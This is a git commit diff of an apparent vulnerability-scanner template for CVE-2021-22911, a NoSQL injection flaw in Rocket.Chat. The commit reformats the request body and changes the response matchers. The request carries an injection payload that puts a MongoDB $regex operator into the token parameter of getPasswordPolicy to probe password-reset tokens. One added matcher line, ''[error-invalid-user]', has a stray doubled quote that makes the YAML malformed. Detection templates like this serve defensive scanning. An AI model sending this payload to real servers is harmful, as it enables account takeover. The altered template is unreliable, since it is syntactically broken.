Update CVE-2021-22911.yaml
parent
3f44bd842c
commit
1e985c9efa
|
@ -27,19 +27,16 @@ requests:
|
|||
Content-Type: application/json
|
||||
Content-Length: 123
|
||||
|
||||
{"message":
|
||||
"{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^6\"}}] }"}
|
||||
{"message": "{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^6\"}}] }"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '[error-invalid-user]'
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- ''[error-invalid-user]'
|
||||
- '"success":true'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue